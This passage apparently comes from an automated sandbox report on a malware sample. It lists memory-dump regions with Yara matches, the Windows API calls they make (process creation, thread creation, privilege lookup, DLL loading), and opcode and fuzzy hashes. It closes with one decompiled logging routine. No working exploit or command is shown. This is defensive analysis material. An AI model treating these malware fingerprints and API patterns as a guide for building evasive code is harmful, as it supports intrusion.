                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
                          • Instruction ID: 707c54b8ecb28b28836f69db4f6f6407f5d3cda7f8506d0c1fca6f825f59b634
                          • Opcode Fuzzy Hash: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
                          • Instruction Fuzzy Hash: C990027120105813D111A1994504B17040D97D0281F91C852A1418668D9796896AB161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                          • Instruction ID: 1bc060fa0c64f0542d151c8b5f8ee5b4dc343904ca5f4ba02577e5504774e7c4
                          • Opcode Fuzzy Hash: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                          • Instruction Fuzzy Hash: B490026921305402D180B1995408B1A040997D1242F91D855A1009668CCA55887D6361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                          • Instruction ID: d799bc0c470dc0b9f88d801a89b0d4ce5c9f1c55982e2471a411198bb596e879
                          • Opcode Fuzzy Hash: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                          • Instruction Fuzzy Hash: 8890027131119802D110A1998404B16040997D1241F51C851A1818668D87D588A97162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                          • Instruction ID: cb538d5faaf988a477ea7407a519ab04c876ebdf382ebaff2fd04f6083780985
                          • Opcode Fuzzy Hash: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                          • Instruction Fuzzy Hash: B990027120105802D100A5D95408B56040997E0341F51D451A6018665EC7A588A97171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                          • Instruction ID: 2ba1b55396f415f28f5be31a96ca0ac624a6a8ecd62e75173e0a21340d5c5a01
                          • Opcode Fuzzy Hash: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                          • Instruction Fuzzy Hash: A790027120105C42D100A1994404F56040997E0341F51C456A1118764D8755C8697561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                          • Instruction ID: b4229797b5e071ee9265592bbec89b5c42883025ad061f727ff4cfe558fda0d1
                          • Opcode Fuzzy Hash: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                          • Instruction Fuzzy Hash: 019002712010DC02D110A1998404B5A040997D0341F55C851A5418768D87D588A97161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
                          • Instruction ID: 6815a63fbbe4233078829d03c5710b8dc7da69a1efc1804a07f569ab752ec62a
                          • Opcode Fuzzy Hash: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
                          • Instruction Fuzzy Hash: CE9002A1202054034105B1994414B26440E97E0241B51C461E20086A0DC66588A97165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
                          • Instruction ID: afea4b8adb8334083aa39ce808f0ba95863ae2fb8be264fa853c9761cb5dbc49
                          • Opcode Fuzzy Hash: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
                          • Instruction Fuzzy Hash: EA900265211054030105E5990704A17044A97D5391351C461F2009660CD76188796161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02DD73A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 867181aae45a387c7611d48cabb922095bf07d23469bb2a71db3145e38100b66
                          • Instruction ID: c032a9e79fd946dfa164af62fd39f7adb4b69da3dd635a48b3538c499ee4d95c
                          • Opcode Fuzzy Hash: 867181aae45a387c7611d48cabb922095bf07d23469bb2a71db3145e38100b66
                          • Instruction Fuzzy Hash: EF316EB6501A00ABD725EF64C8A0FA7B7B9EF88700F10855DFA595B245D730A945CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02DD73A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: a3160a053959fe0791a4b080108bc42a49f0e9d4b4b7e82d6b0fdd0ef45a4263
                          • Instruction ID: 6a6ab2b0939f976a8c044772da51d85ecf83c189bd2ec91d6bb38a90fe235a8a
                          • Opcode Fuzzy Hash: a3160a053959fe0791a4b080108bc42a49f0e9d4b4b7e82d6b0fdd0ef45a4263
                          • Instruction Fuzzy Hash: 2B21D576901A00ABD711EF64C8A0FABBBB5FF88700F10815DFA195B345D330E845CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                          • Instruction ID: 752e8a2bd38f763e439223290fd4c1cc17ec9e71d8e5eca97facf2e9530549ed
                          • Opcode Fuzzy Hash: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                          • Instruction Fuzzy Hash: 70019E762046046BD722DF98DC95ED77768EF847A0F044095F94C9B342D630EE10CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                          • Instruction ID: 0fef18ad4931a2164a11649bab8d7f09d3461900a17ff2834bcfa20b1b58c1a9
                          • Opcode Fuzzy Hash: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                          • Instruction Fuzzy Hash: 9BF0E2B62046146BCB15DF98DC48EEB779CEF88650F154595F90CAB241C631E910CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 8d2a41694837887a845761df5b38f3fd818c1db9a712c60f669b873a982ae35c
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: 95E012B1200208ABDB18EF99CC48EA777ADEF88750F018558FA085B241C631E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC72DA
                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC72FB
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                          • Instruction ID: 02f689d638769298ffc7457882837d603fbb03a1740b3e5f81bdf5644c6b3e0a
                          • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                          • Instruction Fuzzy Hash: C001A731A8022AB7E721A6949C42FFEB76D9B40B51F144118FF04BB2C4EAD46D058AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DC9BB2
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 7be03d780a86099dfc09d055bd9ec017c385c29945d677d3ef617578e5349881
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: 37011EB5D0020EBBDF10DAE4DC81FEEB379DB54708F104199A90897284F631EB14CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DD89B4
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                          • Instruction ID: a7b34fd588468ba745c04ad9f52e11b6561780406f4324b7e40daea4f51ec0a1
                          • Opcode Fuzzy Hash: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                          • Instruction Fuzzy Hash: 00F0C9B6200209ABDB14DF99DC84EEB77ADEF88750F108559FA0C97241D630E911CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DD89B4
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: a3e16d2cc9b1c5ef963305d5c337b5b702ff5a0a0610b2074d961a1b07724175
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: 5501AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DCCCF0,?,?), ref: 02DD746C
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                          • Instruction ID: 54303434b90ed91461814824764d52c9f1be8737e52c567fb87aa5fe2907f023
                          • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                          • Instruction Fuzzy Hash: 06E092333807043AE73065AD9C02FA7B39DCB81B24F540066FA4DEB2C0D595F80146E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCCFC2,02DCCFC2,?,00000000,?,?), ref: 02DD8A80
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                          • Instruction ID: 231f47c458c84a0b976678cae9d1f099c0f25700628589b02335c1ad8cfcd845
                          • Opcode Fuzzy Hash: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                          • Instruction Fuzzy Hash: 06E0E5751142906FCB10CB69DC44E973FA8DF45240F044599FD8857202C4309414CBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCCFC2,02DCCFC2,?,00000000,?,?), ref: 02DD8A80
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: e10fcdcf72c754cbd656c534fb38eab90132f0e2ef59e10ed184ef8e324f7ae9
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: 94E01AB12002086BDB10DF89CC84EE737ADEF88650F018154FA0857241C931E910CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02DC7C83,?), ref: 02DCD45B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                          • Instruction ID: c51ae60e7238ae97ffba9210fee56889ce7fa8b872e2177673801049a16e15f7
                          • Opcode Fuzzy Hash: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                          • Instruction Fuzzy Hash: F0D02B363503042BE610FBF49C02F1932896B00B64F060264FB189F3C3D910D40085A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02DC7C83,?), ref: 02DCD45B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction ID: eb824039d79eff45aa7e9fb3a79ab57c89afaedea01fa75631e40de8cf8e897f
                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction Fuzzy Hash: 92D05E717503042AE610AAA49C02F2632899B45A44F494064FA48973C3EA60E8008561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                          • Instruction ID: 1af0dfa8aaa3e4bca2caa01c24db564de267b144821823e2931f99c0a81a84b9
                          • Opcode Fuzzy Hash: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                          • Instruction Fuzzy Hash: B4B09B719014D5C5D651D7E04A08B2B7D047BD0741F17C5D1D2124755B4778C095F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 53%
                          			E0385FDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;
                          				_push(_a4);
                          				_t14 =  *[fs:0x18];
                          				_t15 = _t12;
                          				_t7 = E0380CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                          				_push(_t13);
                          				E03855720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                          				_t9 =  *_t15;
                          				if(_t9 == 0xffffffff) {
                          					_t10 = 0;
                          				} else {
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                          				}
                          				_push(_t10);
                          				_push(_t15);
                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                          				return E03855720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                          			}

                          Instruction addresses (disassembly column, instruction text not present in this export): 0x0385fdda, 0x0385fde2, 0x0385fde5, 0x0385fdec, 0x0385fdfa, 0x0385fdff, 0x0385fe0a, 0x0385fe0f, 0x0385fe17, 0x0385fe1e, 0x0385fe19, 0x0385fe20, 0x0385fe21, 0x0385fe22, 0x0385fe25, 0x0385fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0385FDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0385FE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0385FE2B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                          • Instruction ID: 17c279f1054b2122049793526047d25980216d83d7ace9f6e2d591b164c1380b
                          • Opcode Fuzzy Hash: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                          • Instruction Fuzzy Hash: E2F0FC76140201BFDE205A85DC01F63BF6ADB45730F140354FA249A1D1DA62F86086F1
                          Uniqueness

                          Uniqueness Score: -1.00%